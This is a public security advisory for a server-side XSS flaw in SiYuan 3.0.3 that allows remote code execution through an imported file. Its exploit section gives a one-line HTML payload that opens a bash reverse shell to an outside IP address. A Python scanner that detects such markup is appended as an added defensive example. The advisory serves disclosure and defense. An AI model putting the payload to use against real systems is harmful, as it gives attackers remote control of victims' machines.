SiYuan 3.0.3 - RCE via Server Side XSS
Summary
Name | SiYuan 3.0.3 - RCE via Server Side XSS |
Code name | |
Product | SiYuan |
Affected versions | Version 3.0.3 |
State | Public |
Release date | 2024-04-03 |
Vulnerability
Kind | Server Side XSS |
Rule | |
Remote | Yes |
CVSSv3.1 Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H |
CVSSv3.1 Base Score | 9.6 |
Exploit available | Yes |
CVE ID(s) |
Description
SiYuan version 3.0.3 allows an attacker to execute arbitrary commands on the server because the application is vulnerable to Server Side XSS.
Vulnerability
A remote code execution vulnerability has been identified in SiYuan. It is triggered when the victim imports a file that contains a malicious HTML payload.
Exploit
<img src="1" onerror="require('child_process').exec('bash -i >& /dev/tcp/24.144.86.165/4444 0>&1');"/>
Evidence of exploitation
Our security policy
We have reserved the ID CVE-2024-2692 to refer to this issue from now on.
System Information
- Version: SiYuan 3.0.3
- Operating System: MacOS
Mitigation
There is currently no patch available for this vulnerability.
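With no patch available, one defensive check is to scan a note file for markup that executes when rendered before importing it. The following is an added example, not part of the advisory or of SiYuan's code; the names `scan_note` and `ActiveContentFinder`, the marker list and the sample note are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Tags that run script or load active content when rendered.
ACTIVE_TAGS = {"script", "iframe", "object", "embed"}
# Substrings suggesting a handler reaches for Node.js APIs (assumed list).
NODE_MARKERS = ("require(", "child_process", "process.binding")


class ActiveContentFinder(HTMLParser):
    """Collects (line, tag, reason) for markup that executes on render."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # Also reached for self-closing tags such as <img .../>.
        line = self.getpos()[0]
        if tag in ACTIVE_TAGS:
            self.findings.append((line, tag, "active tag"))
        for name, value in attrs:
            value = (value or "").strip()
            if name.startswith("on"):
                reason = f"event handler {name}"
                if any(marker in value for marker in NODE_MARKERS):
                    reason += " calling Node.js API"
                self.findings.append((line, tag, reason))
            elif name in ("src", "href") and value.lower().startswith("javascript:"):
                self.findings.append((line, tag, f"javascript: URL in {name}"))


def scan_note(text):
    """Return findings for a note's text; an empty list means nothing flagged."""
    finder = ActiveContentFinder()
    finder.feed(text)
    finder.close()
    return finder.findings


# Constructed sample note: Markdown with inline HTML, harmless command string.
SAMPLE = """# Meeting notes
Plain *Markdown* text is fine.
<img src="logo.png" alt="logo">
<img src="1" onerror="require('child_process').exec('echo constructed-sample')"/>
<a href="javascript:void(0)">link</a>
"""

if __name__ == "__main__":
    for line, tag, reason in scan_note(SAMPLE):
        print(f"line {line}: <{tag}> {reason}")
```

This is a heuristic pre-import filter for files from untrusted sources, not a replacement for a vendor fix.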
Credits
The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.
References
Vendor page https://github.com/siyuan-note/siyuan/
Timeline
- 2024-03-18: Vulnerability discovered.
- 2024-03-19: Vendor contacted.
- 2024-04-03: Public Disclosure.